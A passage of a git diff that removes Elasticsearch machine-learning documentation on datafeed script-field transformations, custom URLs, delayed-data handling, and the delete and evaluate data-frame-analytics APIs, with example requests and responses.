_ml/datafeeds/datafeed-test1 -{ - "job_id": "test1", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "total_error_count": { <2> - "script": { - "lang": "expression", - "source": "doc['error_count'].value + doc['aborted_count'].value" - } - } - } -} ----------------------------------- -// TEST[skip:needs-licence] - -<1> A script field named `total_error_count` is referenced in the detector -within the job. -<2> The script field is defined in the {dfeed}. - -This `test1` {anomaly-job} contains a detector that uses a script field in a -mean analysis function. The `datafeed-test1` {dfeed} defines the script field. -It contains a script that adds two fields in the document to produce a "total" -error count. - -The syntax for the `script_fields` property is identical to that used by {es}. -For more information, see -{ref}/search-fields.html#script-fields[Script fields]. - -You can preview the contents of the {dfeed} by using the following API: - -[source,console] ----------------------------------- -GET _ml/datafeeds/datafeed-test1/_preview ----------------------------------- -// TEST[skip:continued] - -In this example, the API returns the following results, which contain a sum of -the `error_count` and `aborted_count` values: - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "total_error_count": 40476 - } -] ----------------------------------- - -NOTE: This example demonstrates how to use script fields, but it contains -insufficient data to generate meaningful results. - -//For a full demonstration of -//how to create jobs with sample data, see <>. - -You can alternatively use {kib} to create an advanced {anomaly-job} that uses -script fields. To add the `script_fields` property to your {dfeed}, you must use -the **Edit JSON** tab. For example: - -[role="screenshot"] -image::images/ml-scriptfields.jpg[Adding script fields to a {dfeed} in {kib}] - -[[ml-configuring-transform-examples]] -== Common script field examples - -While the possibilities are limitless, there are a number of common scenarios -where you might use script fields in your {dfeeds}. - -[NOTE] -=============================== -Some of these examples use regular expressions. By default, regular -expressions are disabled because they circumvent the protection that Painless -provides against long running and memory hungry scripts. For more information, -see {ref}/modules-scripting-painless.html[Painless scripting language]. - -Machine learning analysis is case sensitive. For example, "John" is considered -to be different than "john". This is one reason you might consider using scripts -that convert your strings to upper or lowercase letters. -=============================== - -[[ml-configuring-transform2]] -.Example 2: Concatenating strings -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test2 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"low_info_content", - "field_name":"my_script_field", <1> - "detector_description": "Custom script field transformation" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test2 -{ - "job_id": "test2", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value + '_' + doc['another_field'].value" <2> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -<1> The script field has a rather generic name in this case, since it will -be used for various tests in the subsequent examples. -<2> The script field uses the plus (+) operator to concatenate strings. - -The preview {dfeed} API returns the following results, which show that "JOE" -and "SMITH " have been concatenated and an underscore was added: - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "JOE_SMITH " - } -] ----------------------------------- - -[[ml-configuring-transform3]] -.Example 3: Trimming strings -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['another_field'].value.trim()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses the `trim()` function to trim extra white space from a -string. - -The preview {dfeed} API returns the following results, which show that "SMITH " -has been trimmed to "SMITH": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "SMITH" - } -] ----------------------------------- - -[[ml-configuring-transform4]] -.Example 4: Converting strings to lowercase -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value.toLowerCase()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses the `toLowerCase` function to convert a string to all -lowercase letters. Likewise, you can use the `toUpperCase{}` function to convert -a string to uppercase letters. - -The preview {dfeed} API returns the following results, which show that "JOE" -has been converted to "joe": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "joe" - } -] ----------------------------------- - -[[ml-configuring-transform5]] -.Example 5: Converting strings to mixed case formats -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value.substring(0, 1).toUpperCase() + doc['some_field'].value.substring(1).toLowerCase()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field is a more complicated example of case manipulation. It uses -the `subString()` function to capitalize the first letter of a string and -converts the remaining characters to lowercase. - -The preview {dfeed} API returns the following results, which show that "JOE" -has been converted to "Joe": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "Joe" - } -] ----------------------------------- - -[[ml-configuring-transform6]] -.Example 6: Replacing tokens -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "/\\s/.matcher(doc['tokenstring2'].value).replaceAll('_')" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses regular expressions to replace white -space with underscores. - -The preview {dfeed} API returns the following results, which show that -"foo bar baz" has been converted to "foo_bar_baz": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "foo_bar_baz" - } -] ----------------------------------- - -[[ml-configuring-transform7]] -.Example 7: Regular expression matching and concatenation -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "def m = /(.*)-bar-([0-9][0-9])/.matcher(doc['tokenstring3'].value); return m.find() ? m.group(1) + '_' + m.group(2) : '';" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field looks for a specific regular expression pattern and emits the -matched groups as a concatenated string. If no match is found, it emits an empty -string. - -The preview {dfeed} API returns the following results, which show that -"foo-bar-19" has been converted to "foo_19": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "foo_19" - } -] ----------------------------------- - -[[ml-configuring-transform8]] -.Example 8: Splitting strings by domain name -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test3 -{ - "description":"DNS tunneling", - "analysis_config":{ - "bucket_span": "30m", - "influencers": ["clientip","hrd"], - "detectors":[ - { - "function":"high_info_content", - "field_name": "sub", - "over_field_name": "hrd", - "exclude_frequent":"all" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test3 -{ - "job_id": "test3", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields":{ - "sub":{ - "script":"return domainSplit(doc['query'].value).get(0);" - }, - "hrd":{ - "script":"return domainSplit(doc['query'].value).get(1);" - } - } -} - -GET _ml/datafeeds/datafeed-test3/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -If you have a single field that contains a well-formed DNS domain name, you can -use the `domainSplit()` function to split the string into its highest registered -domain and the sub-domain, which is everything to the left of the highest -registered domain. For example, the highest registered domain of -`www.ml.elastic.co` is `elastic.co` and the sub-domain is `www.ml`. The -`domainSplit()` function returns an array of two values: the first value is the -subdomain; the second value is the highest registered domain. - -The preview {dfeed} API returns the following results, which show that -"www.ml.elastic.co" has been split into "elastic.co" and "www.ml": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "clientip.keyword": "123.456.78.900", - "hrd": "elastic.co", - "sub": "www.ml" - } -] ----------------------------------- - -[[ml-configuring-transform9]] -.Example 9: Transforming geo_point data -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test4 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"lat_long", - "field_name": "my_coordinates" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test4 -{ - "job_id": "test4", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "my_coordinates": { - "script": { - "source": "doc['coords.lat'].value + ',' + doc['coords.lon'].value", - "lang": "painless" - } - } - } -} - -GET _ml/datafeeds/datafeed-test4/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -In {es}, location data can be stored in `geo_point` fields but this data type is -not supported natively in {ml} analytics. This example of a script field -transforms the data into an appropriate format. For more information, -see <>. - -The preview {dfeed} API returns the following results, which show that -`41.44` and `90.5` have been combined into "41.44,90.5": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_coordinates": "41.44,90.5" - } -] ----------------------------------- - diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc deleted file mode 100644 index bd46bbd01e9..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[role="xpack"] -[[ml-configuring-url]] -= Adding custom URLs to machine learning results - -You can optionally attach one or more custom URLs to your {anomaly-jobs}. These -links appear in the anomalies table in the *Anomaly Explorer* and -*Single Metric Viewer* and can direct you to dashboards, the *Discover* app, or -external websites. For example, you can define a custom URL that provides a way -for users to drill down to the source data from the results set: - -[role="screenshot"] -image::images/ml-customurl.jpg["An example of the custom URL links in the Anomaly Explorer anomalies table"] - -When you create or edit an {anomaly-job} in {kib}, it simplifies the creation -of the custom URLs for {kib} dashboards and the *Discover* app and it enables -you to test your URLs. For example: - -[role="screenshot"] -image::images/ml-customurl-edit.gif["Add a custom URL in {kib}",width=75%] - -For each custom URL, you must supply the URL and a label, which is the link text -that appears in the anomalies table. You can also optionally supply a time -range. When you link to *Discover* or a {kib} dashboard, you'll have additional -options for specifying the pertinent index pattern or dashboard name and query -entities. - -[discrete] -[[ml-configuring-url-strings]] -== String substitution in custom URLs - -You can use dollar sign ($) delimited tokens in a custom URL. These tokens are -substituted for the values of the corresponding fields in the anomaly records. -For example, the `Raw data` URL might resolve to `discover#/?_g=(time:(from:'$earliest$',mode:absolute,to:'$latest$'))&_a=(index:ff959d40-b880-11e8-a6d9-e546fe2bba5f,query:(language:kuery,query:'customer_full_name.keyword:"$customer_full_name.keyword$"'))`. In this case, the pertinent value of the `customer_full_name.keyword` field -is passed to the target page when you click the link. - -TIP: Not all fields in your source data exist in the anomaly results. If a -field is specified in the detector as the `field_name`, `by_field_name`, -`over_field_name`, or `partition_field_name`, for example, it can be used in a -custom URL. A field that is used only in the `categorization_field_name` -property, however, does not exist in the anomaly results. When you create your -custom URL in {kib}, the *Query entities* option is shown only when there are -appropriate fields in the detectors. - -The `$earliest$` and `$latest$` tokens pass the beginning and end of the time -span of the selected anomaly to the target page. The tokens are substituted with -date-time strings in ISO-8601 format. If you selected an interval of 1 hour for -the anomalies table, these tokens use one hour on either side of the anomaly -time as the earliest and latest times. You can alter this behavior by setting a -time range for the custom URL. - -There are also `$mlcategoryregex$` and `$mlcategoryterms$` tokens, which pertain -to {anomaly-jobs} where you are categorizing field values. For more information -about this type of analysis, see <>. The -`$mlcategoryregex$` token passes the regular expression value of the category of -the selected anomaly, as identified by the value of the `mlcategory` field of -the anomaly record. The `$mlcategoryterms$` token passes the terms value of the -category of the selected anomaly. Each categorization term is prefixed by a plus -(+) character, so that when the token is passed to a {kib} dashboard, the -resulting dashboard query seeks a match for all of the terms of the category. -For example, the following API updates a job to add a custom URL that uses -`$earliest$`, `$latest$`, and `$mlcategoryterms$` tokens: - -[source,console] ----------------------------------- -POST _ml/anomaly_detectors/sample_job/_update -{ - "custom_settings": { - "custom_urls": [ - { - "url_name": "test-link1", - "time_range": "1h", - "url_value": "discover#/?_g=(time:(from:'$earliest$',mode:quick,to:'$latest$'))&_a=(index:'90943e30-9a47-11e8-b64d-95841ca0b247',query:(language:lucene,query_string:(analyze_wildcard:!t,query:'$mlcategoryterms$')),sort:!(time,desc))" - } - ] - } -} ----------------------------------- -//TEST[skip:setup:sample_job] - -When you click this custom URL in the anomalies table in {kib}, it opens up the -*Discover* page and displays source data for the period one hour before and -after the anomaly occurred. Since this job is categorizing log messages, some -`$mlcategoryterms$` token values that are passed to the target page in the query -might include `+REC +Not +INSERTED +TRAN +Table +hostname +dbserver.acme.com`. - -[TIP] -=============================== -* The custom URL links in the anomaly tables use pop-ups. You must configure -your web browser so that it does not block pop-up windows or create an exception -for your {kib} URL. -* When creating a link to a {kib} dashboard, the URLs for dashboards can be very -long. Be careful of typos, end of line characters, and URL encoding. Also ensure -you use the appropriate index ID for the target {kib} index pattern. -* If you use an influencer name for string substitution, keep in mind that it -might not always be available in the analysis results and the URL is invalid in -those cases. There is not always a statistically significant influencer for each -anomaly. -* The dates substituted for `$earliest$` and `$latest$` tokens are in -ISO-8601 format and the target system must understand this format. -* If the job performs an analysis against nested JSON fields, the tokens for -string substitution can refer to these fields using dot notation. For example, -`$cpu.total$`. -* {es} source data mappings might make it difficult for the query string to work. -Test the custom URL before saving the job configuration to check that it works -as expected, particularly when using string substitution. -=============================== diff --git a/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc b/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc deleted file mode 100644 index e1de295e43e..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[[ml-delayed-data-detection]] -= Handling delayed data - -Delayed data are documents that are indexed late. That is to say, it is data -related to a time that your {dfeed} has already processed and it is therefore -never analyzed by your {anomaly-job}. - -When you create a {dfeed}, you can specify a -{ref}/ml-put-datafeed.html#ml-put-datafeed-request-body[`query_delay`] setting. -This setting enables the {dfeed} to wait for some time past real-time, which -means any "late" data in this period is fully indexed before the {dfeed} tries -to gather it. However, if the setting is set too low, the {dfeed} may query for -data before it has been indexed and consequently miss that document. Conversely, -if it is set too high, analysis drifts farther away from real-time. The balance -that is struck depends upon each use case and the environmental factors of the -cluster. - -== Why worry about delayed data? - -This is a particularly prescient question. If data are delayed randomly (and -consequently are missing from analysis), the results of certain types of -functions are not really affected. In these situations, it all comes out okay in -the end as the delayed data is distributed randomly. An example would be a `mean` -metric for a field in a large collection of data. In this case, checking for -delayed data may not provide much benefit. If data are consistently delayed, -however, {anomaly-jobs} with a `low_count` function may provide false positives. -In this situation, it would be useful to see if data comes in after an anomaly is -recorded so that you can determine a next course of action. - -== How do we detect delayed data? - -In addition to the `query_delay` field, there is a delayed data check config, -which enables you to configure the datafeed to look in the past for delayed data. -Every 15 minutes or every `check_window`, whichever is smaller, the datafeed -triggers a document search over the configured indices. This search looks over a -time span with a length of `check_window` ending with the latest finalized bucket. -That time span is partitioned into buckets, whose length equals the bucket span -of the associated {anomaly-job}. The `doc_count` of those buckets are then -compared with the job's finalized analysis buckets to see whether any data has -arrived since the analysis. If there is indeed missing data due to their ingest -delay, the end user is notified. For example, you can see annotations in {kib} -for the periods where these delays occur. - -== What to do about delayed data? - -The most common course of action is to simply to do nothing. For many functions -and situations, ignoring the data is acceptable. However, if the amount of -delayed data is too great or the situation calls for it, the next course of -action to consider is to increase the `query_delay` of the datafeed. This -increased delay allows more time for data to be indexed. If you have real-time -constraints, however, an increased delay might not be desirable. In which case, -you would have to {ref}/tune-for-indexing-speed.html[tune for better indexing speed]. diff --git a/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc deleted file mode 100644 index 29e78f43fb7..00000000000 --- a/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[delete-dfanalytics]] -= Delete {dfanalytics-jobs} API -[subs="attributes"] -++++ -Delete {dfanalytics-jobs} -++++ - -Deletes an existing {dfanalytics-job}. - -experimental[] - - -[[ml-delete-dfanalytics-request]] -== {api-request-title} - -`DELETE _ml/data_frame/analytics/` - - -[[ml-delete-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-delete-dfanalytics-path-params]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics] - -[[ml-delete-dfanalytics-query-params]] -== {api-query-parms-title} - -`force`:: - (Optional, Boolean) If `true`, it deletes a job that is not stopped; this method is - quicker than stopping and deleting the job. - -`timeout`:: - (Optional, <>) The time to wait for the job to be deleted. - Defaults to 1 minute. - - - -[[ml-delete-dfanalytics-example]] -== {api-examples-title} - -The following example deletes the `loganalytics` {dfanalytics-job}: - -[source,console] --------------------------------------------------- -DELETE _ml/data_frame/analytics/loganalytics --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following result: - -[source,console-result] ----- -{ - "acknowledged" : true -} ----- diff --git a/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc deleted file mode 100644 index 6c64df9a3a3..00000000000 --- a/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[delete-trained-models]] -= Delete trained models API -[subs="attributes"] -++++ -Delete trained models -++++ - -Deletes an existing trained {infer} model that is currently not referenced by an -ingest pipeline. - -experimental[] - - -[[ml-delete-trained-models-request]] -== {api-request-title} - -`DELETE _ml/trained_models/` - - -[[ml-delete-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-delete-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-delete-trained-models-response-codes]] -== {api-response-codes-title} - -`409`:: - The code indicates that the trained model is referenced by an ingest pipeline - and cannot be deleted. - - -[[ml-delete-trained-models-example]] -== {api-examples-title} - -The following example deletes the `regression-job-one-1574775307356` trained -model: - -[source,console] --------------------------------------------------- -DELETE _ml/trained_models/regression-job-one-1574775307356 --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following result: - - -[source,console-result] ----- -{ - "acknowledged" : true -} ----- - diff --git a/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc deleted file mode 100644 index 70be9d067bc..00000000000 --- a/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc +++ /dev/null @@ -1,541 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[evaluate-dfanalytics]] -= Evaluate {dfanalytics} API - -[subs="attributes"] -++++ -Evaluate {dfanalytics} -++++ - -Evaluates the {dfanalytics} for an annotated index. - -experimental[] - - -[[ml-evaluate-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/_evaluate` - - -[[ml-evaluate-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-evaluate-dfanalytics-desc]] -== {api-description-title} - -The API packages together commonly used evaluation metrics for various types of -machine learning features. This has been designed for use on indexes created by -{dfanalytics}. Evaluation requires both a ground truth field and an analytics -result field to be present. - - -[[ml-evaluate-dfanalytics-request-body]] -== {api-request-body-title} - -`evaluation`:: -(Required, object) Defines the type of evaluation you want to perform. -See <>. -+ --- -Available evaluation types: - -* `outlier_detection` -* `regression` -* `classification` - --- - -`index`:: -(Required, object) Defines the `index` in which the evaluation will be -performed. - -`query`:: -(Optional, object) A query clause that retrieves a subset of data from the -source index. See <>. - -[[ml-evaluate-dfanalytics-resources]] -== {dfanalytics-cap} evaluation resources - -[[oldetection-resources]] -=== {oldetection-cap} evaluation objects - -{oldetection-cap} evaluates the results of an {oldetection} analysis which -outputs the probability that each document is an outlier. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. - The data type of this field can be boolean or integer. If the data type is - integer, the value has to be either `0` (false) or `1` (true). - -`predicted_probability_field`:: - (Required, string) The field of the `index` that defines the probability of - whether the item belongs to the class in question or not. It's the field that - contains the results of the analysis. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. - Available metrics: - - `auc_roc`::: - (Optional, object) The AUC ROC (area under the curve of the receiver - operating characteristic) score and optionally the curve. Default value is - {"include_curve": false}. - - `confusion_matrix`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metrics (`tp` - true positive, `fp` - false positive, `tn` - true - negative, `fn` - false negative) are calculated. Default value is - {"at": [0.25, 0.50, 0.75]}. - - `precision`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metric is calculated. Default value is {"at": [0.25, 0.50, 0.75]}. - - `recall`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metric is calculated. Default value is {"at": [0.25, 0.50, 0.75]}. - - -[[regression-evaluation-resources]] -=== {regression-cap} evaluation objects - -{regression-cap} evaluation evaluates the results of a {regression} analysis -which outputs a prediction of values. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. - The data type of this field must be numerical. - -`predicted_field`:: - (Required, string) The field in the `index` that contains the predicted value, - in other words the results of the {regression} analysis. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. For - more information on `mse`, `msle`, and `huber`, consult - https://github.com/elastic/examples/tree/master/Machine%20Learning/Regression%20Loss%20Functions[the Jupyter notebook on regression loss functions]. - Available metrics: - - `mse`::: - (Optional, object) Average squared difference between the predicted values - and the actual (`ground truth`) value. For more information, read - {wikipedia}/Mean_squared_error[this wiki article]. - - `msle`::: - (Optional, object) Average squared difference between the logarithm of the - predicted values and the logarithm of the actual (`ground truth`) value. - - `offset`:::: - (Optional, double) Defines the transition point at which you switch from - minimizing quadratic error to minimizing quadratic log error. Defaults to - `1`. - - `huber`::: - (Optional, object) Pseudo Huber loss function. For more information, read - {wikipedia}/Huber_loss#Pseudo-Huber_loss_function[this wiki article]. - - `delta`:::: - (Optional, double) Approximates 1/2 (prediction - actual)^2^ for values - much less than delta and approximates a straight line with slope delta for - values much larger than delta. Defaults to `1`. Delta needs to be greater - than `0`. - - `r_squared`::: - (Optional, object) Proportion of the variance in the dependent variable that - is predictable from the independent variables. For more information, read - {wikipedia}/Coefficient_of_determination[this wiki article]. - - - -[[classification-evaluation-resources]] -== {classification-cap} evaluation objects - -{classification-cap} evaluation evaluates the results of a {classanalysis} which -outputs a prediction that identifies to which of the classes each document -belongs. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. - The data type of this field must be categorical. - -`predicted_field`:: - (Optional, string) The field in the `index` which contains the predicted value, - in other words the results of the {classanalysis}. - -`top_classes_field`:: - (Optional, string) The field of the `index` which is an array of documents - of the form `{ "class_name": XXX, "class_probability": YYY }`. - This field must be defined as `nested` in the mappings. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. - Available metrics: - - `accuracy`::: - (Optional, object) Accuracy of predictions (per-class and overall). - - `auc_roc`::: - (Optional, object) The AUC ROC (area under the curve of the receiver - operating characteristic) score and optionally the curve. - It is calculated for a specific class (provided as "class_name") treated as - positive. - - `class_name`:::: - (Required, string) Name of the only class that is treated as positive - during AUC ROC calculation. Other classes are treated as negative - ("one-vs-all" strategy). All the evaluated documents must have - `class_name` in the list of their top classes. - - `include_curve`:::: - (Optional, Boolean) Whether or not the curve should be returned in - addition to the score. Default value is false. - - `multiclass_confusion_matrix`::: - (Optional, object) Multiclass confusion matrix. - - `precision`::: - (Optional, object) Precision of predictions (per-class and average). - - `recall`::: - (Optional, object) Recall of predictions (per-class and average). - - -//// -[[ml-evaluate-dfanalytics-results]] -== {api-response-body-title} - -`outlier_detection`:: - (object) If you chose to do outlier detection, the API returns the - following evaluation metrics: - -`auc_roc`::: TBD - -`confusion_matrix`::: TBD - -`precision`::: TBD - -`recall`::: TBD -//// - - -[[ml-evaluate-dfanalytics-example]] -== {api-examples-title} - - -[[ml-evaluate-oldetection-example]] -=== {oldetection-cap} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "my_analytics_dest_index", - "evaluation": { - "outlier_detection": { - "actual_field": "is_outlier", - "predicted_probability_field": "ml.outlier_score" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following results: - -[source,console-result] ----- -{ - "outlier_detection": { - "auc_roc": { - "score": 0.92584757746414444 - }, - "confusion_matrix": { - "0.25": { - "tp": 5, - "fp": 9, - "tn": 204, - "fn": 5 - }, - "0.5": { - "tp": 1, - "fp": 5, - "tn": 208, - "fn": 9 - }, - "0.75": { - "tp": 0, - "fp": 4, - "tn": 209, - "fn": 10 - } - }, - "precision": { - "0.25": 0.35714285714285715, - "0.5": 0.16666666666666666, - "0.75": 0 - }, - "recall": { - "0.25": 0.5, - "0.5": 0.1, - "0.75": 0 - } - } -} ----- - - -[[ml-evaluate-regression-example]] -=== {regression-cap} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "house_price_predictions", <1> - "query": { - "bool": { - "filter": [ - { "term": { "ml.is_training": false } } <2> - ] - } - }, - "evaluation": { - "regression": { - "actual_field": "price", <3> - "predicted_field": "ml.price_prediction", <4> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {"offset": 10}, - "huber": {"delta": 1.5} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The output destination index from a {dfanalytics} {reganalysis}. -<2> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the test split -only. -<3> The ground truth value for the actual house price. This is required in order -to evaluate results. -<4> The predicted value for house price calculated by the {reganalysis}. - - -The following example calculates the training error: - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "student_performance_mathematics_reg", - "query": { - "term": { - "ml.is_training": { - "value": true <1> - } - } - }, - "evaluation": { - "regression": { - "actual_field": "G3", <2> - "predicted_field": "ml.G3_prediction", <3> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {}, - "huber": {} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the train split -only. It means that a training error will be calculated. -<2> The field that contains the ground truth value for the actual student -performance. This is required in order to evaluate results. -<3> The field that contains the predicted value for student performance -calculated by the {reganalysis}. - - -The next example calculates the testing error. The only difference compared with -the previous example is that `ml.is_training` is set to `false` this time, so -the query excludes the train split from the evaluation. - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "student_performance_mathematics_reg", - "query": { - "term": { - "ml.is_training": { - "value": false <1> - } - } - }, - "evaluation": { - "regression": { - "actual_field": "G3", <2> - "predicted_field": "ml.G3_prediction", <3> - "metrics": { - "r_squared": {}, - "mse": {}, - "msle": {}, - "huber": {} - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> In this example, a test/train split (`training_percent`) was defined for the -{reganalysis}. This query limits evaluation to be performed on the test split -only. It means that a testing error will be calculated. -<2> The field that contains the ground truth value for the actual student -performance. This is required in order to evaluate results. -<3> The field that contains the predicted value for student performance -calculated by the {reganalysis}. - - -[[ml-evaluate-classification-example]] -=== {classification-cap} - - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "animal_classification", - "evaluation": { - "classification": { <1> - "actual_field": "animal_class", <2> - "predicted_field": "ml.animal_class_prediction", <3> - "metrics": { - "multiclass_confusion_matrix" : {} <4> - } - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -<1> The evaluation type. -<2> The field that contains the ground truth value for the actual animal -classification. This is required in order to evaluate results. -<3> The field that contains the predicted value for animal classification by -the {classanalysis}. -<4> Specifies the metric for the evaluation. - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "classification" : { - "multiclass_confusion_matrix" : { - "confusion_matrix" : [ - { - "actual_class" : "cat", <1> - "actual_class_doc_count" : 12, <2> - "predicted_classes" : [ <3> - { - "predicted_class" : "cat", - "count" : 12 <4> - }, - { - "predicted_class" : "dog", - "count" : 0 <5> - } - ], - "other_predicted_class_doc_count" : 0 <6> - }, - { - "actual_class" : "dog", - "actual_class_doc_count" : 11, - "predicted_classes" : [ - { - "predicted_class" : "dog", - "count" : 7 - }, - { - "predicted_class" : "cat", - "count" : 4 - } - ], - "other_predicted_class_doc_count" : 0 - } - ], - "other_actual_class_count" : 0 - } - } - } --------------------------------------------------- -<1> The name of the actual class that the analysis tried to predict. -<2> The number of documents in the index that belong to the `actual_class`. -<3> This object contains the list of the predicted classes and the number of -predictions associated with the class. -<4> The number of cats in the dataset that are correctly identified as cats. -<5> The number of cats in the dataset that are incorrectly classified as dogs. -<6> The number of documents that are classified as a class that is not listed as -a `predicted_class`. - - - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "animal_classification", - "evaluation": { - "classification": { <1> - "actual_field": "animal_class", <2> - "metrics": { - "auc_roc" : { <3> - "class_name": "dog" <4> - } - } - } - } -} 